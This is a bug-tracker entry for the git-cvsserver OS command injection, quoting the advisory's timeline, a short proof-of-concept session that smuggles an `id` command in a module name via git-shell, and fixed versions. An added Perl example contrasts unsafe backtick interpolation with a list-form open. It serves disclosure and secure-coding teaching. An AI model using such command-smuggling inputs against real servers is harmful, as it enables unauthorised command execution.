[CVE] Git cvsserver OS Command Injection
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| git (Debian) | Fix Released | Unknown | | |
| git (Ubuntu) | Fix Released | High | Simon Quigley | |
| Trusty | Fix Released | High | Simon Quigley | |
| Xenial | Fix Released | High | Simon Quigley | |
| Zesty | Fix Released | High | Simon Quigley | |
| Artful | Fix Released | High | Simon Quigley | |
Bug Description
From oss-security[1]:
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://
[ Affected Products ]
Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)
https:/
[ Vendor communication ]
2017-09-08 Sent vulnerability details to the git-security list
2017-09-09 Acknowledgement of the issue, git maintainers ask if
2017-09-10 Patch is provided
2017-09-11 Further backtick operations are patched by the git
2017-09-11 Revised patch is sent out
2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default
2017-09-22 Draft release for git 2.14.2 is created including the
2017-09-26 Release of this advisory, release of fixed git versions
[ Description ]
The `git` subcommand `cvsserver` is a Perl script which makes excessive
use of the backtick operator to invoke `git`. Unfortunately user input
is used within some of those invocations.
It should be noted that `git-cvsserver` will be invoked by `git-shell`
by default without further configuration.
[ Example ]
Below is an example of an OS Command Injection within `git-cvsserver`
triggered via `git-shell`:
[git@...t ~]$ cat .ssh/authorized
command="git-shell -c \"$SSH_
[joernchen@...t ~]$ ssh git@...alhost cvs server
Root /tmp
E /tmp/ does not seem to be a valid GIT repository
E
error 1 /tmp/ is not a valid repository
Directory .
`id>foooooo`
add
fatal: Not a git repository: '/tmp/'
Invalid module '`id>foooooo`' at /usr/lib/
[joernchen@...t ~]$
[git@...t ~]$ cat foooooo
uid=619(git) gid=618(git) groups=618(git)
[git@...t ~]$
[ Solution ]
Upgrade to one of the following git versions:
* 2.14.2
* 2.13.6
* 2.12.5
* 2.11.4
* 2.10.5
[ end of file ]
-------------------
No CVE has been assigned yet, but a fix has been released upstream and as seen above, the fixes are already in Debian.
The following upstream commits claim to fix the issue:
- 985f59c042320dd
- 31add46823fe926
- 6d6e2f812d36678
- dca89d4e56dde4b
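The pattern the advisory describes, as an added example that is not code from git-cvsserver or from the advisory: a value interpolated into Perl backticks is parsed by the shell, while a list-form pipe `open` passes it to the program as a single argument. The `$module` value, the helper names and the allow-list regex are constructed for illustration, and a harmless `echo`/`printf` stands in for any real command.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed input standing in for a client-supplied module name.
# The embedded backticks are plain data at this point.
my $module = 'demo`echo INJECTED`';

# Unsafe pattern: Perl interpolates $arg into the backtick string and
# hands the whole line to /bin/sh, which then performs its own command
# substitution on the backticks contained in the value.
sub unsafe_capture {
    my ($arg) = @_;
    my $out = `printf '%s' $arg`;
    return $out;
}

# Safe pattern: list-form pipe open executes the program directly and
# passes every argument as-is, so no shell ever parses the value.
sub safe_capture {
    my ($cmd, @args) = @_;
    open(my $fh, '-|', $cmd, @args) or die "cannot run $cmd: $!";
    local $/;                       # slurp all output at once
    my $out = <$fh>;
    close($fh) or die "$cmd exited with status $?";
    return defined $out ? $out : '';
}

# Defense in depth: accept only names made of expected characters.
# This allow-list is an assumption for the example, not git's own rule.
sub valid_module {
    my ($name) = @_;
    return $name =~ /\A[A-Za-z0-9._\/-]+\z/ ? 1 : 0;
}

# The unsafe call shows the substituted text in its output; the safe
# call returns the value unchanged, backticks included.
printf "unsafe: %s\n", unsafe_capture($module);
printf "safe:   %s\n", safe_capture('printf', '%s', $module);
printf "valid:  %s\n", valid_module($module) ? 'yes' : 'no';
```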
Changed in git (Debian):
status: Unknown → Fix Released
summary:
- [DSA 3984-1] Git cvsserver OS Command Injection
+ [CVE] Git cvsserver OS Command Injection
Changed in git (Ubuntu Artful):
status: In Progress → Fix Committed
Security Team:
Debian marks this as a high-importance vulnerability; I'll follow suit and change the importance here. Please feel free to mark it otherwise.
Otherwise, I plan on working on a fix for this; I'll put something here within an hour or two.
Thanks!